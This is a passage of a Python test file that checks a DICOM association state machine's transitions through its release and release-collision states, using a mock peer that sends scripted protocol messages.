('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt18']
def test_evt19(self):
"""Test Sta7 + Evt19."""
# Sta7 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt19']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState08(TestStateBase):
"""Tests for State 08: Awaiting A-RELEASE (rp) primitive."""
def test_evt01(self):
"""Test Sta8 + Evt1."""
# Sta8 + Evt1 -> <ignore> -> Sta8
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
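        # Overriding is_release_requested to return False presumably stops the
        # association from automatically answering the peer's A-RELEASE-RQ, so
        # the FSM stays parked in Sta8 while the test raises the next event.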
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta8 + Evt2."""
# Sta8 + Evt2 -> <ignore> -> Sta8
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta8 + Evt3."""
# Sta8 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt3']
def test_evt04(self):
"""Test Sta8 + Evt4."""
# Sta8 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_associate_rj),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta8 + Evt5."""
# Sta8 + Evt5 -> <ignore> -> Sta8
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta8 + Evt6."""
# Sta8 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_associate_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt6']
def test_evt07(self):
"""Test Sta8 + Evt7."""
# Sta8 + Evt7 -> <ignore> -> Sta8
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt7']
def test_evt08(self):
"""Test Sta8 + Evt8."""
# Sta8 + Evt8 -> <ignore> -> Sta8
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt8']
def test_evt09(self):
"""Test Sta8 + Evt9."""
# Sta8 + Evt9 -> AR-7 -> Sta8
# Evt9: Receive P-DATA primitive from <local user>
# AR-7: Send P-DATA-TF PDU to <remote>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt9']
def test_evt10(self):
"""Test Sta8 + Evt10."""
# Sta8 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', p_data_tf),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt10']
def test_evt11(self):
"""Test Sta8 + Evt11."""
# Sta8 + Evt11 -> <ignore> -> Sta8
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt11']
def test_evt12(self):
"""Test Sta8 + Evt12."""
# Sta8 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # get a_assoc_rq
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt12']
def test_evt13(self):
"""Test Sta8 + Evt13."""
# Sta8 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_release_rp),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt13']
def test_evt14(self):
"""Test Sta8 + Evt14."""
# Sta8 + Evt14 -> AR-4 -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-4: Send A-RELEASE-RP PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt14']
def test_evt15(self):
"""Test Sta8 + Evt15."""
# Sta8 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt15']
def test_evt16(self):
"""Test Sta8 + Evt16."""
        # Sta8 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_abort),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt16']
def test_evt17(self):
"""Test Sta8 + Evt17."""
# Sta8 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt17']
def test_evt18(self):
"""Test Sta8 + Evt18."""
        # Sta8 + Evt18 -> <ignore> -> Sta8
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt18']
def test_evt19(self):
"""Test Sta8 + Evt19."""
# Sta8 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', b'\x08\x00\x00\x00\x00\x00'),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt19']
class TestState09(TestStateBase):
"""Tests for State 09: Release collision req - awaiting A-RELEASE (rp)."""
def test_evt01(self):
"""Test Sta9 + Evt1."""
# Sta9 + Evt1 -> <ignore> -> Sta9
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1), # no response
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta9 + Evt2."""
# Sta9 + Evt2 -> <ignore> -> Sta9
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta9 + Evt3."""
# Sta9 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_ac), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta9 + Evt4."""
# Sta9 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq),
('send', a_associate_rj),
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta9 + Evt5."""
# Sta9 + Evt5 -> <ignore> -> Sta9
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta9 + Evt6."""
# Sta9 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_rq), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta9 + Evt7."""
# Sta9 + Evt7 -> <ignore> -> Sta9
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt7'
]
def test_evt08(self):
"""Test Sta9 + Evt8."""
# Sta9 + Evt8 -> <ignore> -> Sta9
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt8'
]
def test_evt09(self):
"""Test Sta9 + Evt9."""
# Sta9 + Evt9 -> <ignore> -> Sta9
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
